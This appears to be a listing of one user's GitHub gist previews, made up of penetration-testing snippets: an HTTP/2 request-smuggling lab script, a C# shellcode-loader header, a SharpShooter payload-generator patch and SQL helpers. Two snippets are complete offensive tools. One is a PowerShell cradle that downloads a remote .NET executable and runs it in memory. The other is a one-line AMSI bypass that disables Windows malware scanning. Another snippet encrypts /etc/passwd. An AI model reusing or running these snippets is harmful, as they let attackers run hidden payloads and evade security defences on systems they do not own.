FrankSpierings

Magisk Module

• Use the modified Magisk module to install the certificate in both the user and the system store.

git clone https://github.com/Magisk-Modules-Repo/movecert.git

• Apply cp patch
• Magisk-Modules-Repo/movecert#16

FrankSpierings

# Thanks to h2 for the example code and thanks to Portswigger for the awesome free labs!
# - https://python-hyper.org/projects/h2/en/stable/plain-sockets-example.html
# - https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection
#
import socket
import ssl

import h2.connection
import h2.events

FrankSpierings

/*
    - Compile: docker run --rm -it -v /tmp/data:/tmp/data mono csc /tmp/data/dinvoke-shellcode.cs -out:/tmp/data/dinvoke-shellcode.exe /platform:x64 /unsafe
    - Reference (Thanks!) : https://jhalon.github.io/utilizing-syscalls-in-csharp-1/
*/
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.ComponentModel;
using Microsoft.Win32;

FrankSpierings

function Invoke-SQLCmd {
    param(
        [Parameter(Mandatory=$True)]
        [string] $Server,
        [Parameter(Mandatory=$True)]
        [string] $Database,
        [Parameter(Mandatory=$True)]
        [string] $Query
    );

FrankSpierings

diff --git a/SharpShooter.py b/SharpShooter.py
index 9b10de1..50cece0 100644
--- a/SharpShooter.py
+++ b/SharpShooter.py
@@ -286,7 +286,7 @@ End Sub"""
                 raise Exception
 
             if(payload_type == 1):
-                if(args.comtechnique):
+                if(args.comtechnique or args.dotnetver == str(4)):

FrankSpierings

$url = "http://server/dotnetexecutable"
$data = (New-Object System.Net.WebClient).DownloadData($url);
$assem = [System.Reflection.Assembly]::Load($data);
$main = $assem.EntryPoint
$main.Invoke(0, @(,[string[]]@("args0")));

FrankSpierings

[Runtime.InteropServices.Marshal]::Copy([Int32[]]@(0), 0,(([Ref].Assembly.GetTypes()|?{$_.Name -like "*iUtils"}).GetFields('NonPublic,Static')|?{$_.Name -match "Context"}).GetValue($null), 1)

FrankSpierings

const { refactor } = require('shift-refactor');
const { commonMethods } = require('refactor-plugin-common');
const Shift = require('shift-ast');
const fs = require('fs');

const src = `
var a = "aap";

function foo() {
	function bar() {

FrankSpierings

powershell "$sql='SELECT @@VERSION';$c=(New-Object -TypeName System.Data.SqlClient.SqlConnection('server=SERVER;Database=DATABASE;Integrated Security=True;'));$c.open();$q=(New-Object System.Data.SqlClient.SqlCommand($sql,$c));$r=$q.ExecuteReader();$oo=@();while ($r.Read()){$o=(New-Object PSObject);for ($i=0;$i -lt $r.FieldCount;$i++){$n=$r.GetName($i);if($n -eq ''){$n='column_'+$i};$o|Add-Member -type NoteProperty -Name $n -Value $r[$i];}$oo+=$o};$oo|FT -Wrap"

FrankSpierings

$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open);
$ms = New-Object System.IO.MemoryStream;
$aes = [System.Security.Cryptography.Aes]::Create();
$aes.keysize = 128;
Write-Host "Key: " (($aes.Key |% ToString X2) -join '');
Write-Host "IV: " (($aes.IV |% ToString X2) -join '');
Write-Host "Mode: " $aes.mode
$cs = New-Object System.Security.Cryptography.CryptoStream($ms, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write);
$fs.CopyTo($cs);